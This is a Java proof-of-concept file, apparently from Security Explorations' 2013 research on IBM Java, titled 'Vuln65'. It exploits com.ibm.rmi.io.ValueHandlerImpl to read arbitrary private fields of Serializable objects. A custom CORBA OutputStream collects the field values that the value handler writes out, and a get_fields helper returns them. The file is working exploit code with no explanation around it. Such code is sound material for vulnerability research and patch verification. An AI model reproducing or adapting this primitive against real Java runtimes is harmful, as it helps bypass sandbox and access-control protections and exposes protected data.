/*## (c) SECURITY EXPLORATIONS    2013 poland                                #*/
/*##     http://www.security-explorations.com                                #*/

/* com.ibm.rmi.io.ValueHandlerImpl                                            */
/* access to arbitrary fields of Serializable classes                         */
 
/* THIS SOFTWARE IS PROTECTED BY DOMESTIC AND INTERNATIONAL COPYRIGHT LAWS    */
/* UNAUTHORISED COPYING OF THIS SOFTWARE IN EITHER SOURCE OR BINARY FORM IS   */
/* EXPRESSLY FORBIDDEN. ANY USE, INCLUDING THE REPRODUCTION, MODIFICATION,    */
/* DISTRIBUTION, TRANSMISSION, RE-PUBLICATION, STORAGE OR DISPLAY OF ANY      */
/* PART OF THE SOFTWARE, FOR COMMERCIAL OR ANY OTHER PURPOSES REQUIRES A      */
/* VALID LICENSE FROM THE COPYRIGHT HOLDER.                                   */

/* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS    */
/* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,*/
/* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL    */
/* SECURITY EXPLORATIONS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, */
/* WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF  */
/* OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE     */
/* SOFTWARE.                                                                  */

import java.lang.*;
import java.net.*;
import java.lang.reflect.*;
import java.lang.invoke.*;
import java.util.*;
import java.io.*;
import java.security.*;
import org.omg.CORBA_2_3.portable.OutputStream;
import org.omg.CORBA.*;
import org.omg.CORBA.portable.BoxedValueHelper;
import com.ibm.rmi.io.*;

public class Vuln65 {

  public static class MyOutputStream extends org.omg.CORBA_2_3.portable.OutputStream {
    LinkedList fields;

    public MyOutputStream() {
     fields=new LinkedList();
    }

    public java.lang.Object[] fields() {
     return fields.toArray();
    }

    public void write_abstract_interface(java.lang.Object obj) {
     fields.add(obj);
    }

    public ORB orb() {
     return null;
    }

    public org.omg.CORBA_2_3.portable.InputStream create_input_stream() {
     return null;
    }

    public void write_value(Serializable s) {
     System.out.println("write_value: "+s);
    }

    public void write_value(Serializable s,Class class1) {
     System.out.println("write_value: "+s+" "+class1);
    }

    public void write_value(Serializable s,String s2) {
     System.out.println("write_value: "+s);
    }

    public void write_value(Serializable s,BoxedValueHelper boxedvaluehelper) {
     System.out.println("write_value: "+s);
    }

    public void write_boolean(boolean flag) {
    }

    public void write_char(char c) {
    }

    public void write_wchar(char c) {
    }

    public void write_octet(byte byte0) {
    }

    public void write_short(short word0) {
    }

    public void write_ushort(short word0) {
    }

    public void write_long(int i) {
    }

    public void write_ulong(int i) {
    }

    public void write_longlong(long l) {
    }

    public void write_ulonglong(long l) {
    }

    public void write_float(float f) {
    }

    public void write_double(double d) {
    }

    public void write_string(String s) {
    }

    public void write_wstring(String s) {
    }

    public void write_boolean_array(boolean aflag[], int i, int j) {
    }

    public void write_char_array(char ac[], int i, int j) {
    }

    public void write_wchar_array(char ac[], int i, int j) {
    }

    public void write_octet_array(byte abyte0[], int i, int j) {
    }

    public void write_short_array(short aword0[], int i, int j) {
    }

    public void write_ushort_array(short aword0[], int i, int j) {
    }

    public void write_long_array(int ai[], int i, int j) {
    }

    public void write_ulong_array(int ai[], int i, int j) {
    }

    public void write_longlong_array(long al[], int i, int j) {
    }

    public void write_ulonglong_array(long al[], int i, int j) {
    }

    public void write_float_array(float af[], int i, int j) {
    }

    public void write_double_array(double ad[], int i, int j) {
    }

    public void write_Object(org.omg.CORBA.Object obj) {
    }

    public void write_TypeCode(TypeCode typecode) {
    }

    public void write_any(Any any) {
    }
  }

  public static java.lang.Object[] get_fields(Serializable s) {
   java.lang.Object fields[]=null;

   try {
    ValueHandlerImpl mvhi=ValueHandlerPool.getValueHandler();

    MyOutputStream mos=new MyOutputStream();
    mvhi.writeValue((org.omg.CORBA_2_3.portable.OutputStream)mos,(Serializable)s);

    fields=mos.fields();
   } catch (Throwable e) {
    e.printStackTrace();
   }

   return fields;
  }
}

